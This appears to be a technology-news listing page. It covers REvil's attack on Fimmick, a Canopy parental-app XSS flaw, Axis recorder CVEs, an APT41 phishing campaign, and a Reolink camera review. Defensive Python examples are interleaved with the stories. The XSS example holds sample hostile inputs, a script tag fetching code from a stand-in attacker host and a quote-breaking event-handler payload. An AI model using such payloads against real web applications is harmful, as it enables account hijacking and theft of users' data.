More stories


    Hong Kong firm becomes latest marketing company hit with REvil ransomware

    Hong Kong marketing firm Fimmick has been hit with a ransomware attack, according to a British cybersecurity firm monitoring the situation. Fimmick has offices in Hong Kong and across China, serving several high-profile clients like McDonald's, Coca-Cola, Shell, Asus and others. Their website is currently down and there was no response to ZDNet requests for comment. Matt Lane, CEO of UK-based cybersecurity firm X Cyber Group, said his team routinely “scrutinizes the activities of cybercriminals for evidence of their behaviors,” as a way to protect clients and customers. On Tuesday, they discovered that REvil had breached Fimmick’s databases and claimed to have data from a number of global brands. Lane shared screenshots showing REvil’s threatening posts toward Fimmick that included information stolen from the company’s website. “We discovered this intelligence as part of those routine activities. We noted, with interest, that the attacker’s ‘Happy Blog’ also appears to be temporarily unavailable but have no further information as to why that might be,” Lane said, adding that the criminal group also shared a directory structure of the stolen data. “You can see Cetaphil, Coca-Cola, Hana-Musubi and Kate Spade are listed.”

    Ransomware gangs have targeted marketing firms multiple times over the last few years because of their ties to larger companies with more valuable data. 

    John Hammond, senior security researcher at Huntress, said that for ransomware operators, the most attractive targets are the ones that lead to even more targets. “In the same vein that cybercriminals prefer a spray-and-pray approach—always opting for the easiest targets and the low-hanging fruit — ransomware gangs love a one-to-many approach, which requires less effort to bring greater results,” Hammond said. “Marketing firms, PR firms, and organizations that integrate closely with other businesses could have a plethora of data and information that make targeting the next victim even easier. Much like service providers, attacking one could start a domino effect to target others that the original victim worked with. Attacking a marketing firm or PR firm allows ransomware gangs to get a bigger bang for their buck.” Allan Liska, a ransomware expert with cybersecurity company Recorded Future, said there have been at least three other marketing firms hit with ransomware over the last year. Wieden+Kennedy was attacked in November 2020 but was forced to notify Oregon Department of Justice officials in April after employees’ personal information was exposed during the incident. MBA Group was hit in March and Empirical Research Partners in September. “I don’t know if they are particularly ripe compared to other industries but I could see marketing firms being more vulnerable to attack, especially phishing attacks as they are used to dealing with a diverse client base and likely receive a lot of emails with attachments, which is a favorite initial access vector for many ransomware groups,” Liska said. “The actual number of marketing firms hit is likely much higher, but unlike hospitals or schools, when a marketing firm gets hit with ransomware, it doesn’t make the news.”


    Researcher finds vulnerability in popular parental control app Canopy

    A researcher with cybersecurity firm Tripwire has discovered a vulnerability in parental control app Canopy that allows attackers to plant JavaScript into the parent portal and gain access to all the features a parent would have with their child’s device. Tripwire principal security researcher Craig Young told ZDNet that Canopy had been advertised to him through his child’s school, prompting him to look through the app’s cybersecurity features. “I had an interest in learning more about how parental control software is implemented and what, if any, risks it may introduce to families. I discovered these vulnerabilities by intentionally examining how the system processes special characters in parental control requests,” Young said. “My kids’ school sent home advertisements for Canopy and so I thought it would be a good service to learn more about. After signing up for a free trial to see what the service has to offer, I tested what would happen if the parent of a kid had special characters in their request message. It was obvious that Canopy is not filtering the user-input.” From there, he investigated further and realized that the URL in a parental control request was also not being filtered properly. He found that a completely external user can inject this XSS with only a single unknown numeric ID value, allowing an attacker to add JavaScript code to the parent portal for each and every Canopy account. The JavaScript could then be used to do anything from cryptocurrency mining to browser exploits targeting parents. The JavaScript could also be used to export data about the customer accounts including location data from monitored devices. The data dump could be sold for a variety of unwelcome purposes, Young added. An attacker would have full access to the parent portal and all features a parent has for monitoring and controlling child devices, and Young said it looks like an attacker would be able to do this en masse to all customers of Canopy.

    Young contacted Canopy but said they have been “minimally responsive,” claiming to have a fix in place. But Young said the fix does not address the full issue and only makes it so a theoretical child is no longer able to attack their parent with the explanation text. But the child can still attack the parent account using the address of a blocked website as the cross-site scripting vector, and a third party could also do this, Young said. They have not responded to his latest outreach letting them know this. Canopy also did not respond to requests for comment from ZDNet. Canopy offers a multitude of services, including a multi-platform parental control app that allows parents to monitor and limit how their children use a device. Canopy operates as a subscription service, requiring monthly payments. Many of the features offered by the service imply the app is given privileged access to the protected device and is intercepting TLS connections to filter content. Young explained that this privileged access can introduce considerable risk to the security of protected devices and the privacy of the children using those devices. He noted that Canopy implements a VPN connection and uses some form of AI on the device for privacy functions. Through examining how the app functions, Young discovered that the Canopy system is failing to sanitize user inputs, leading to cross-site scripting, which allows attackers to embed an attack payload within an exception request. “Although there may be a wide range of ways a clever kid could abuse this vulnerability, the most obvious would be to automatically approve a request. The input field did not seem to have any sanitization and allowed 50 characters which was plenty to source an external script,” Young explained in his report. “My first test was a payload to automatically click to approve the incoming request. This worked well and I quickly got another payload working to automatically pause monitoring protection. At this point, the child using the protected device could inject arbitrary JavaScript into an authenticated parent session. This could be useful for a variety of child-to-parent attacks including making a self-approving exception request or a request which automatically disables the monitoring software when viewed. This is bad, but it could be worse.” Young did note that this kind of exploitation is “noisy,” meaning a parent needs to interact with the malicious request and may recognize the attack in progress.

    Further examination of the Canopy app showed that the system could be tricked by combining double and single quotes. With that, someone could submit an exception request which takes control of the Canopy app when the parent simply logs in to check on the monitored devices. “This situation does not bode well for the Canopy parental control system but at the same time, you may be wondering if this is really a big deal. After all, most kids who are being monitored with this system aren’t going to have a clue about XSS or have access to a parent console to develop an exploit payload,” Young wrote. “Unfortunately, the attack surface for this vulnerability is quite a bit more substantial than what was discussed earlier with request explanation text. Because this attack involves a crafted URL being blocked, it becomes possible for attacks to come from completely external third-party sources. Anyone who can get a child using the protected device to click a link can now potentially attack the parents monitoring this account.” A child only needs to be convinced to click on a request access button once the URL has been loaded, but Young said the scariest part is that the Canopy API design will “even allow the external attacker to directly plant a cross-site scripting payload on a parent account by guessing the parent account ID.” Due to the relatively short length of account IDs, attackers could theoretically seed the attack payload on every single parent account by simply issuing a block exception request for each ID value in sequence, according to Young. “The external attacker may use this to redirect the parent to advertisements, exploits or other malicious content. Alternatively, an attacker could plant a payload to hijack access to the parental control app and pull GPS coordinates from protected devices on the account,” Young said. “From my perspective, this is a pretty fundamental failure for an app advertising it can keep kids safe online.” A number of cybersecurity experts told ZDNet that these types of flaws are present on a large number of services. Oliver Tavakoli, CTO at Vectra, said the developers of the Canopy service seem to lack an understanding of how to secure a service against malicious actors, adding that not cleansing input fields or data (such as URLs) received from the internet “is to fail Security 101.” Tavakoli did say that this particular flaw is somewhat harder to exploit because it requires coaxing a child to click on a link in order to deliver a payload to a parent system. Others said the vulnerability was another example of why “Injection” flaws have been in the OWASP Top 10 for more than a decade. Ray Kelly, principal security engineer at NTT Application Security, said developers are still being careless when accepting untrusted and unfiltered input from users. “Accepting unfiltered input can lead to a cross-site scripting vulnerability which can create a wide range of issues. This includes stealing a user’s session cookies, redirecting to a malicious website or embedding a keylogger,” Kelly said. “This also demonstrates why security testing of all inputs in a web application is so important and how it can reach to mobile devices, drastically increasing your attack surface.” When asked how Canopy can fix the issue, Young said Canopy needs to sanitize all user-input values. “I would also recommend that Canopy establish a security reporting policy and guidelines for how researchers can responsibly probe their systems and share technical feedback,” Young added.
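    The two vectors the report describes (the request explanation text and the blocked URL, with mixed quotes used to break out of an attribute) come down to untrusted fields being written into the parent's page without escaping. The following Python is an added illustration, not Canopy's code (the article does not describe their stack): one renderer builds the request card by plain concatenation, the other validates the URL's scheme and escapes each field for the HTML context it lands in. The sample requests, the hostnames and the field names are constructed for the example; the 50-character explanation limit is the field length the report mentions.

```python
import html
from urllib.parse import urlsplit

# Constructed sample requests (not from the report).  The first is benign; the
# second carries a script tag in the explanation text; the third has a blocked
# URL whose mixed quotes are meant to break out of an HTML attribute.
BENIGN = {"explanation": "Need this site for homework",
          "url": "https://example.org/math"}
HOSTILE_TEXT = {"explanation": '<script src="//attacker.invalid/p.js"></script>',
                "url": "https://example.org/"}
HOSTILE_URL = {"explanation": "please",
               "url": "https://a.invalid/\" onmouseover='alert(1)' x=\""}

MAX_EXPLANATION = 50  # field length the report mentions


def render_request_vulnerable(req):
    """Flaw pattern: both untrusted fields are concatenated straight into the
    parent portal's markup, so whatever was submitted with the request
    becomes part of the parent's page when they log in to review it."""
    return ('<div class="request">'
            f'<a href="{req["url"]}">{req["url"]}</a>'
            f'<p>{req["explanation"]}</p>'
            '<button>Approve</button></div>')


def safe_url(url):
    """Accept only absolute http(s) URLs with a host; everything else
    (javascript:, data:, relative paths) is rejected before rendering."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed IPv6 literal and the like
        return None
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return url


def render_request_safe(req):
    """Hardened rendering: the URL is validated, then escaped for the attribute
    context (quote=True turns both ' and " into entities) and for the text
    context; the explanation is length-limited and escaped as text."""
    url = safe_url(req["url"])
    href = html.escape(url, quote=True) if url else "#"
    link_text = html.escape(url) if url else "(blocked: invalid URL)"
    text = html.escape(req["explanation"][:MAX_EXPLANATION], quote=True)
    return ('<div class="request">'
            f'<a href="{href}">{link_text}</a>'
            f'<p>{text}</p>'
            '<button>Approve</button></div>')


def contains_active_markup(rendered):
    """Crude check used for the comparison: a raw script tag or an unescaped
    quoted event handler in the output means input went through unescaped."""
    return "<script" in rendered or "onmouseover='" in rendered


if __name__ == "__main__":
    for req in (BENIGN, HOSTILE_TEXT, HOSTILE_URL):
        print("vulnerable:", contains_active_markup(render_request_vulnerable(req)))
        print("hardened:  ", contains_active_markup(render_request_safe(req)))
```

    Escaping is done at render time and per context, which is what survives the mixed-quote trick: the attacker-controlled URL still passes the scheme check, but once both quote characters become entities it can no longer close the `href` attribute. Stripping a blocklist of characters at submission time, by contrast, is the kind of partial fix the report says still left the URL vector open.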


    Axis releases updates for three new vulnerabilities found by security company

    Nozomi Networks Labs unveiled three different vulnerabilities in video recording device software from Axis. Axis has already released firmware updates addressing each issue after being notified about the vulnerabilities in June. The issues affected Axis OS Active track 10.7, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3, Axis OS 2020 LTS track 9.80.3.5, Axis OS Active track 10.8, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3 and Axis OS 2020 LTS track 9.80.3.5. Axis is a billion-dollar company with offices in more than 50 countries and systems in iconic locations like the White House, Sydney Airport, the Moscow Metro, the Madrid bus system and the City of Houston. Researchers with Nozomi Networks Labs bought an Axis Companion Recorder and sought to investigate the cybersecurity features of the equipment. They discovered a heap-based buffer overflow (CVE-2021-31986, CVSSv3 6.7), improper recipient validation in network test functionalities (CVE-2021-31987, CVSSv3 4.1) and SMTP header injection in email test functionality (CVE-2021-31988, CVSSv3 5.5). The researchers found the heap-based buffer overflow vulnerability in the read callback function, which “failed to verify that no more than ‘size’ multiplied with ‘items’ number of bytes are copied in the libcurl destination buffer.” They found that the parameters provided are “externally controllable and were insufficiently validated by the server-side code prior to reaching the read callback function.”

    CVE-2021-31987 is related to the test functions of HTTP, email and TCP recipients, which have blocklist-based security checks to impede interactions with localhost-exposed network services. Nozomi Networks Labs researchers found that these checks could be circumvented with known bypasses or were incomplete. “By convincing a victim user into visiting a specifically crafted webpage while logged-in to the Companion Recorder web application, an external remote attacker can interact with internal-only services running on the device, obtaining access to restricted information,” the security company wrote. “The third vulnerability is due to an SMTP header injection, located in the SMTP test function. By convincing a victim user into visiting a specifically crafted webpage while logged-in to the Companion Recorder web application, an external remote attacker can trick the device into sending malicious emails to other users with arbitrary SMTP header values. This can be abused to perform phishing attacks, spread malware via emails, or disclose internal information.” CVE-2021-31986 and CVE-2021-31988 affect Axis OS Active track 10.7, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3, Axis OS 2020 LTS track 9.80.3.5. CVE-2021-31987 is found in Axis OS Active track 10.8, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3 and Axis OS 2020 LTS track 9.80.3.5. After Nozomi Networks Labs contacted Axis with the issues in June, the company confirmed them in July and worked with the researchers to verify the firmware updates. Nozomi Networks Labs said some devices are not included and will “receive a patch according to their planned maintenance & release schedule.”
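    The second and third issues are both input-validation defects in "test this recipient" features, and the write-up's point about blocklists is the useful one for anyone building a similar feature. The Python below is an added example, not Axis firmware (the article says nothing about how the checks are implemented): a string blocklist of the kind described, next to a recipient check that resolves the host and decides on the properties of the resulting addresses, plus a header builder for the email test that refuses CR/LF instead of stripping it. The name-to-address table, hostnames and addresses are constructed placeholders so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed name-to-address table standing in for DNS so the example runs
# offline; names and addresses are placeholders, not values from the advisory.
FAKE_DNS = {
    "mail.example.invalid": {"93.184.216.34"},
    "recorder.corp.invalid": {"10.0.0.5"},
    "both.corp.invalid": {"93.184.216.34", "127.0.0.1"},  # one public, one loopback
    "127.0.0.2": {"127.0.0.2"},
    "::1": {"::1"},
}


def fake_resolver(host):
    return FAKE_DNS.get(host, set())


def live_resolver(host):
    """Real resolver for use outside the example: every address the name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def blocklist_check(host):
    """The weak pattern: a short string blocklist.  It passes 127.0.0.2, any
    name that happens to resolve to loopback, and anything on the LAN."""
    return host.lower() not in {"localhost", "127.0.0.1", "::1"}


def is_internal_address(ip):
    """Decide on what the address is, not on how it was spelled."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved
            or not addr.is_global)


def recipient_allowed(target, resolver=fake_resolver):
    """Parse the host out of a user-supplied recipient (URL or host:port),
    resolve it, and refuse the test if any resolved address is non-public.
    A resolver that fails or returns nothing also refuses."""
    try:
        host = urlsplit(target if "//" in target else "//" + target).hostname
    except ValueError:
        return False
    if not host:
        return False
    try:
        addrs = resolver(host)
    except OSError:
        return False
    if not addrs:
        return False
    return not any(is_internal_address(a) for a in addrs)


def header_value(value):
    """Reject a header value containing CR, LF or NUL rather than stripping it,
    so an extra header or a second body cannot be smuggled into the test mail."""
    return None if any(c in value for c in "\r\n\0") else value


def build_test_message(sender, recipient, subject):
    """Assemble the SMTP test message; returns None if any header is unsafe."""
    fields = [("From", sender), ("To", recipient), ("Subject", subject)]
    cleaned = [(name, header_value(v)) for name, v in fields]
    if any(v is None for _, v in cleaned):
        return None
    head = "".join(f"{name}: {v}\r\n" for name, v in cleaned)
    return head + "\r\nThis is a test message from the recorder.\r\n"
```

    Two caveats apply to the recipient check. The address that passed the check must be the one the device actually connects to, otherwise a name that changes answers between the check and the connection (DNS rebinding) defeats it; and the `is_global` flag covers ranges the older property checks miss, so both are combined rather than relying on one.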


    What, exactly, is cybersecurity? And why does it matter?

    Cybersecurity focuses on protecting electronic information on websites, networks, or devices from hackers. Through advanced technology and sophisticated processes, cybersecurity professionals help keep data safe and accessible. Individuals and businesses alike face cybersecurity threats. In addition, businesses need protection from unauthorized data access — both from inside and outside the organization. Strong cybersecurity reduces the chances that a cyber attack will affect business operations. Cybersecurity also has political implications. The US Department of Homeland Security designated election infrastructure as “critical” in 2017. This infrastructure includes voter registration databases and the digital technologies used to count, display, and confirm voting results — some of America’s most sensitive data.

    And cybersecurity can also affect public safety and health. In one case, hackers attempted to poison the municipal water supplies of cities in Florida and California. The hackers gained access to the technology platforms controlling the water systems. Luckily, officials caught the hacks before anyone got sick. Individuals can take simple steps to maintain their cybersecurity, like using a password manager app. But businesses typically require more sophisticated, proactive cybersecurity strategies. As a result, the number of people responsible for handling a company’s cybersecurity depends on an organization’s resources and operational needs. A company might have a large cybersecurity team, or just one person with multiple digital duties.

    Is cybersecurity considered an IT job?

    People who work in cybersecurity often work closely with other IT professionals, like network administrators, and in various other roles. For this reason, experts and those within the industry often group cybersecurity jobs within the broader sector of IT.

    Despite the need to work together with other technology professionals, cybersecurity employees tend to focus on different issues than IT workers. These issues include preventing and analyzing data security incidents and developing and enforcing security standards to protect digital information. In most cases, cybersecurity is considered an IT job. However, cybersecurity jobs usually focus on protecting digital information. Some organizations may title these individuals “cybersecurity specialist” or “cybersecurity manager.” Related cybersecurity job titles include cybersecurity engineer or cybersecurity administrator.

    5 reasons why cybersecurity is important

    Millions of Americans share personal information on the internet every day — whether while working remotely, making online purchases, or completing financial transactions. That makes cybersecurity more important than ever.

    1. Cybercrimes are rising

    In an increasingly digitized and connected world, cybercrime can cause major disruptions. As more workplaces moved to remote work in 2020, the number of cyberattacks skyrocketed. One study found a 400% increase in cybercrime in 2019-2020. In addition to a growing number of cybercrimes, the types of attacks have grown. Malware, phishing, and DDoS attacks can take down major corporations and risk the private data of millions of people.

    2. Your data is valuable

    Cyberattacks target both individuals and systems. These cybercriminals seek out private data, including financial information. That data is valuable. Stealing someone’s Social Security number, for example, makes it easy to take out credit cards in their name and run up debt. So does targeting dates of birth, credit card information, and addresses.

    3. Cybercrimes result in economic costs

    The economic cost of cybercrimes runs into the trillions. According to one estimate, cyberattacks cost the global economy $1 trillion every year. Ransomware attacks can bankrupt companies, disrupt financial markets, and tank people’s personal finances. The cost of cybercrimes makes it even more important to implement security systems and increase internet safety.

    4. Your devices could be exploited

    Every day, hackers come up with new ways to break into systems and exploit devices. Take cryptojacking, for example. Hackers use a target’s devices to mine cryptocurrency for the hacker. Add that to a long list of cybercrimes like proxy phishing, password attacks, and malware.

    5. Cyberattacks pose real-life threats

    Cybercrime might seem like a distant problem that only affects a small number of people. But cyberattacks don’t only target information security. They can also compromise infrastructure, which threatens health and safety. In late 2020, for example, ransomware attacks targeted U.S. hospitals. These attacks tried to steal data to force hospitals to pay a ransom. And hospitals aren’t the only target. Schools, law enforcement agencies, and governments have all been the victims of cyberattacks.

    How to protect yourself against hackers and cyberattacks

    You can take several simple steps right now to protect your data from hackers and prevent cyberattacks. Here are the best ways to make your data safer.

    Follow password best practices

    A strong password keeps hackers from breaching your accounts. Instead of reusing the same password on multiple platforms, create unique, complex passwords, particularly for sites that store private data or credit card information. Worried about keeping all those passwords straight? Consider getting a password manager so you’ll never forget your password again.

    Change your password after a breach

    Take a look at current events and there’s a good chance you’ll hear about a data breach. After a breach, you should change your password — but recent research shows that few people actually update their passwords. That leaves your data vulnerable to a cyberattack. The site Have I Been Pwned lets users check whether their accounts may have been compromised.

    Learn to spot phishing attempts

    Every email inbox receives spam emails. Most of us know not to open emails from Nigerian princes. But every day, people click on phishing emails claiming to offer prizes or asking customers to “verify” details. These phishing attempts trick people into giving up their own personal info. Make sure you understand common phishing red flags to dodge cyberattacks.

    Install antivirus software

    Installing antivirus software on your devices — including cell phones — helps protect your data against malware, viruses and other cyberattacks. These software programs secure your passwords, block malware, and protect financial data during online transactions. Major providers include Norton Antivirus, McAfee Total Protection, and Kaspersky Total Security. Before installing or downloading antivirus software, consider your needs and find the right provider to protect your internet safety.

    In conclusion

    Cybersecurity matters for everyone, even people who don’t think they use technology directly. Nearly every aspect of modern life involves sharing digital information. That’s why, no matter the industry, cybersecurity is essential. Cybersecurity professionals work to keep personal and business information safe from current — and future — threats.
    What is cybersecurity?

    Cybersecurity is the profession of protecting digital information, devices, and networks from unauthorized users. People in this profession also ensure the integrity, security, and accessibility of information for authorized users.

    How does cybersecurity protect us?

    Cybersecurity protects digital information — and the people who use networks, computers, and devices — from unauthorized access or data loss.

    How can we prevent cybercrimes?

    Information security specialists help prevent cybercrimes by protecting personal data, implementing security systems, and investigating cybercrimes. People can also spot scams and use antivirus software to prevent cybercrimes.

    Why is cybersecurity important for students?

    Like everyone else, students need to protect their private data. Students can also study cybersecurity to launch careers in a growing tech specialty. 



    BlackBerry ties malware campaign targeting victims in India to Chinese cyberespionage group

    The BlackBerry Research & Intelligence team released a new report on Tuesday linking disparate malware campaigns to Chinese cyberespionage group APT41, noting that the group has been taking advantage of Cobalt Strike activity using a bespoke Malleable C2 Profile that uses COVID-19 phishing lures to target victims in India. The team was able to link phishing lures via PDF and ZIP files containing information related to tax legislation and COVID-19 statistics, masqueraded as being from Indian government entities. The US government filed charges in 2020 against five APT41 members for hacking into more than 100 companies across the world. US officials said APT41 members managed to compromise foreign government computer networks in India and Vietnam, as well as pro-democracy politicians and activists in Hong Kong. The APT41 group is one of the most infamous and active state-sponsored hacking groups. APT41’s operations were first detailed in a FireEye report published in August 2019, with the report linking the group to some of the biggest supply-chain attacks in recent years, and to older hacks going back as early as 2012. The group uses publicly available profiles designed to look like legitimate network traffic from Amazon, Gmail, OneDrive and others. BlackBerry found connections between this campaign and others published by FireEye in 2020, as well as Prevailion, Subex and PTSecurity. “The image we uncovered was that of a state-sponsored campaign that plays on people’s hopes for a swift end to the pandemic as a lure to entrap its victims. And once on a user’s machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic,” the team said in its report. “APT41 is a prolific Chinese state sponsored cyber threat group that has conducted malware campaigns related to espionage and financially motivated criminal activity dating as far back as 2012. This threat group has targeted organizations around the world, in many verticals such as travel, telecommunications, healthcare, news, and education. APT41 has often used phishing emails with malicious attachments as an initial infection vector. Once they have gained access to a target organization, they typically deploy more advanced malware to establish a persistent foothold. This group uses a variety of different malware families including information stealers, keyloggers, and backdoors.”

    The researchers said they discovered what they believe to be additional APT41 infrastructure and phishing lures targeting victims in India that contained information related to new tax legislation and COVID-19 statistics. These messages purported to be from Indian government entities, the report said. The goal of the attack was to load and execute a Cobalt Strike Beacon on a victim’s network using the phishing lures and attachments. FireEye and other cybersecurity companies have spent years documenting APT41’s tactics and the BlackBerry team said it found a malleable C2 profile on GitHub that resembled one mentioned by FireEye and authored by a Chinese security researcher with the pseudonym ‘1135’. “These profiles had several similarities: both used jQuery Malleable C2 Profiles, and portions of the HTTP GET profile block are almost identical. HTTP header fields such as ‘accept’, ‘user-agent’, ‘host’, and ‘referer’, as well as the ‘set-uri’ field, were all exact matches to the profile data listed in the FireEye blog,” the report explained. “By extracting and correlating the HTTP headers used in the GET and POST requests defined in the Beacon configs, we can generate revealing connections between seemingly disparate Cobalt Strike infrastructure. While we identified a relatively small number of Beacons using the BootCSS domain as part of their malleable C2 configuration, there were also a few clusters with unique configuration metadata that enabled us to identify additional beacons related to APT41. The Beacons served by these new nodes are using a different malleable profile to those in the original cluster that attempts to make the Beacon traffic look like legitimate Microsoft traffic.” The domains the team found also follow a similar naming convention, and in looking through the campaign, BlackBerry discovered a set of three PDFs linked to .microsoftdocs.workers[.]dev domains targeting victims in India. The lures promised information related to taxation rules and COVID-19 advisories. The first PDF related to tax rules contains an embedded PowerShell script that is executed while the PDF is displayed to the user. “The PowerShell script downloads and executes a payload via ‘%temp%conhost.exe’, which loads a payload file called ‘event.dat’. This .DAT file is a Cobalt Strike Beacon. The second and third lures each have similar execution flows and component parts; a PDF lure, conhost.exe, and an event.* payload. In this case, these event files had a .LOG extension, rather than .DAT,” the report found. “The biggest difference between the second and third lures is that the first uses a self-extracting archive named ‘India records highest ever single day covid_19 recoveries.pdf.exe’, and the second uses a ZIP file named ‘India records highest ever single day COVID-19 recoveries.zip’. Lures two and three also contain the same information within their respective PDFs. Both relate to a record high number of COVID-19 recoveries in India, information which purports to be from the Indian Government Ministry of Health & Family Welfare.” The researchers noted that a previous September 2020 report from Subex found similar phishing attempts also targeted at Indian nationals. That report attributes the attack to the Evilnum APT group but the BlackBerry researchers disagreed, citing a number of reasons why they believe the culprit is APT41. The payloads are actually Cobalt Strike Beacons, a hallmark of APT41 according to BlackBerry, and there are a number of configuration settings that tie the attack to APT41. “With the resources of a nation-state level threat group, it’s possible to create a truly staggering level of diversity in their infrastructure. And while no one security group has that same level of funding, by pooling our collective brainpower we can still uncover the tracks that the cybercriminals involved worked so hard to hide,” the researchers added.
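    The report's pivot, comparing the `set-uri` and the GET/POST request headers (`accept`, `user-agent`, `host`, `referer`) across extracted Beacon configurations, is a small amount of bookkeeping once the configs are in hand. The Python below is an added example of that correlation and is not BlackBerry's tooling: it fingerprints each config on those fields, groups C2 hosts that share an identical profile, and, going one step beyond the exact matches the report describes, lists pairs that agree on most fields so a profile with one changed header is not missed. Every hostname, URI and header value in the sample is a constructed placeholder, not an indicator from the report.

```python
import hashlib
from collections import defaultdict
from itertools import combinations

COMPARED_HEADERS = ("accept", "host", "referer", "user-agent")


def beacon(c2, uri, user_agent, host, referer,
           accept="text/html,application/xhtml+xml,*/*"):
    """Build a constructed Beacon config record: the C2 hostname plus the parts
    of a malleable profile the report compares (set-uri and the GET/POST
    request headers).  All values are placeholders, not indicators."""
    headers = {"accept": accept, "host": host,
               "referer": referer, "user-agent": user_agent}
    return {"c2": c2, "uri": uri, "get": dict(headers), "post": dict(headers)}


# Two hosts share a jQuery-looking profile, two share a Microsoft-looking one,
# and a fifth matches the first pair on everything except the referer.
SAMPLE_CONFIGS = [
    beacon("cdn-a.invalid", "/jquery-3.3.1.min.js", "UA-ONE",
           "code.jquery.invalid", "http://code.jquery.invalid/"),
    beacon("cdn-b.invalid", "/jquery-3.3.1.min.js", "UA-ONE",
           "code.jquery.invalid", "http://code.jquery.invalid/"),
    beacon("update-c.invalid", "/owa/", "UA-TWO",
           "outlook.office.invalid", "https://outlook.office.invalid/owa/"),
    beacon("update-d.invalid", "/owa/", "UA-TWO",
           "outlook.office.invalid", "https://outlook.office.invalid/owa/"),
    beacon("lone-e.invalid", "/jquery-3.3.1.min.js", "UA-ONE",
           "code.jquery.invalid", "http://other.invalid/"),
]


def profile_fields(cfg):
    """Flatten the compared parts of a config into name -> normalized value."""
    fields = {"uri": cfg["uri"].strip()}
    for verb in ("get", "post"):
        for name in COMPARED_HEADERS:
            fields[f"{verb}:{name}"] = cfg[verb].get(name, "").strip().lower()
    return fields


def profile_fingerprint(cfg):
    """Stable digest of the compared fields; equal digests are an exact match."""
    canon = "\n".join(f"{k}={v}" for k, v in sorted(profile_fields(cfg).items()))
    return hashlib.sha256(canon.encode()).hexdigest()[:16]


def cluster_by_profile(configs):
    """Group C2 hosts by exact profile fingerprint."""
    clusters = defaultdict(list)
    for cfg in configs:
        clusters[profile_fingerprint(cfg)].append(cfg["c2"])
    return {fp: sorted(hosts) for fp, hosts in clusters.items()}


def linked_infrastructure(configs):
    """Clusters of two or more hosts: apparently unrelated C2s on one profile."""
    return [hosts for hosts in cluster_by_profile(configs).values() if len(hosts) > 1]


def shared_fields(a, b):
    """Names of the compared fields on which two configs match exactly."""
    fa, fb = profile_fields(a), profile_fields(b)
    return sorted(k for k in fa if fa[k] == fb[k])


def near_matches(configs, min_shared):
    """Pairs sharing at least min_shared fields but not all of them, which the
    exact clustering above would keep apart."""
    total = len(profile_fields(configs[0])) if configs else 0
    pairs = []
    for a, b in combinations(configs, 2):
        n = len(shared_fields(a, b))
        if min_shared <= n < total:
            pairs.append((a["c2"], b["c2"], n))
    return pairs


if __name__ == "__main__":
    print("exact clusters:", linked_infrastructure(SAMPLE_CONFIGS))
    print("near matches:  ", near_matches(SAMPLE_CONFIGS, 6))
```

    The fingerprint deliberately excludes the C2 hostname and anything else that is cheap for an operator to rotate; the profile is what the report treats as the sticky attribute. The near-match threshold is a judgement call on real data, since widely reused public profiles will link unrelated operators on the common fields.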


    Reolink RLC-811A security camera review: Pan tilt, zoom and an extra loud siren

    Pros

    ✓Pan, tilt, and zoom from the app

    ✓Loud siren

    ✓Clear images at night

    Cons

    ✕Must have NVR or PoE switch to work

    The Reolink RLC-811A security camera is large and sturdy with a well-built metal housing and a strong metal mount. This camera means business.

    The RLC 811A uses PoE (Power over Ethernet), so you do not need to position it near a power supply to use it. Run an Ethernet cable up to 330ft in length to the camera, connect the Ethernet cable to a PoE injector and connect the PoE injector to a power adapter inside your home. The PoE injector does not come with the RLC 811A, but you can buy PoE switches from TP-Link or Netgear on Amazon. Alternatively, you can buy an NVR (Network Video Recorder) directly from Reolink to store local recordings. In the box, there is the camera, which is rated IP66, so is waterproof and dustproof, a waterproof connection, a 1m Ethernet cable and a pack of screws with wall plugs. There is also a quick start guide, a paper template for drilling, and a surveillance sign. The camera is fitted with a metal case and an overhanging cowl to stop rain from hitting the lens. It has five LED spotlights that illuminate up to 100ft, a sensor, and four infrared lights. At the rear of the camera, there is a metal cover for the SD card, screwed into the camera housing. The RLC 811A will support an SD card of up to 256GB capacity.


    I had issues turning the camera on initially, but pressing the reset button cable for 10 seconds made the camera bleep which let me know that the camera was ready to connect and initialise. To connect the camera to the Reolink app, either scan the QR code or find the camera model listed in the LAN list and connect. The camera will initialise and show you the live view of the area.
    The RLC-811A is a 4K camera with 3840x2160px resolution, 5x optical zoom, and when zoomed in, the image is still fairly crisp. Its viewing angle ranges from 31 to 105 degrees. The camera also has a motorised lens ranging from 27mm to 13.5mm. You can use the pan, tilt, and zoom to control the camera from your app. Setting the push and siren notifications means that you will receive an email and a push notification when the camera detects something in its motion zone. Outside, the siren will sound, and the spotlights will illuminate the object in its path. Its two-way microphone allows you to talk to whoever is in your field of view. The audio is loud and clear, and the microphone, situated underneath the camera, is easily heard. You can also record a voice clip that will play instead of a siren.
    The onboard siren is very loud and will certainly alert anyone within the camera’s field of view that they are being watched. You can specify when you want the siren to sound and set schedules for when detected motion will not trigger the siren. You can also select zones that the camera will ignore, so that motion there will not trigger an alert, and set how sensitive you want the camera to be. You can even specify what you want the camera to detect — either humans or vehicles.

    I like the time-lapse feature on this camera. Turn it on, and the camera will take images at regular intervals during the day and save the video onto the SD card. Unfortunately, the time-lapse feature does not work if you have an NVR. It is a great way to find out what happens during the entire day in your backyard.

    You can integrate the RLC-811A with your smart home appliances. Select the device and click enable to use hands-free voice commands or display the view outside on your Chromecast TV. You can choose to add an SD card to the camera if you do not want to use an NVR. You cannot use Reolink’s cloud storage with this model at the moment. However, cameras like the Reolink Go PT, Argus 3, Argus PT, and E1 Zoom do use this feature.

    For under $110, there is little not to like about the Reolink RLC-811A security camera. It is a pain to set up if you do not have an NVR, and you need to purchase a PoE injector and power adapter to deliver power to the unit. But once the RLC-811A is connected and configured, you can relax knowing that your home is secured. If there are any issues, your security camera will sound the alarm, allow you to speak to the visitor, and capture a really detailed image of the person entering your space, day or night.


    Facebook whistleblower: 'Morally bankrupt' social giant will have to 'hook kids' to grow

